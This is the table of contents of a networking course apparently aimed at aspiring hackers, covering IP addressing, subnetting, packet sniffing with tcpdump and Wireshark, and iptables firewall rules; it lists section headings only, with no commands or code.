Chapter 1 — Network Basics

Table of Contents

1. IP Addresses

2. Classes of IP Addresses

3. Public vs Private IP Addresses

Private IP Ranges

4. DHCP

5. NAT

6. Ports

Must-Know Ports

Scan Ports with nmap

7. TCP/IP & Protocols

8. IP Header Anatomy

Key Fields for Hackers

9. TCP Header & Flags

The 6 TCP Flags

Window Size & OS Fingerprinting

10. TCP Three-Way Handshake

11. UDP

12. Network Topologies

Bus Topology

Star Topology (Most common for LANs)

Ring Topology

Mesh Topology (How the internet works)

13. The OSI Model

OSI Layers + Attack Map

⚡ Exercises

🔑 Quick Reference

Chapter 2 — Subnetting & CIDR Notation

Why Subnetting?

Subnets

Subnet Masks

CIDR Notation

Worked Example — Subnetting a Class C

CIDR Quick Reference

Hacker Relevance

⚡ Exercises

Chapter 3 — Network Analysis

CLI Network Tools

ifconfig

ping

netstat

ss

Network Sniffers

tcpdump

Basic Usage

Filter by IP

Filter by Port

Filter by TCP Flags

Combine Filters

Hunt for Credentials

Grab User-Agent & Cookies

3-Way Handshake in tcpdump Output

Wireshark

Three Panes

Wireshark Filters

Wireshark Operators

Following Streams

Statistics

⚡ Exercises

Chapter 4 — Linux Firewalls (iptables)

What is a Firewall?

iptables Structure

Tables

Chains (in FILTER table)

Targets (Actions)

Core Commands

Key Options

Creating Rules

Block an IP address

Block an entire subnet

Block a specific port

Allow outbound to a specific site

Block all outbound web traffic (except above)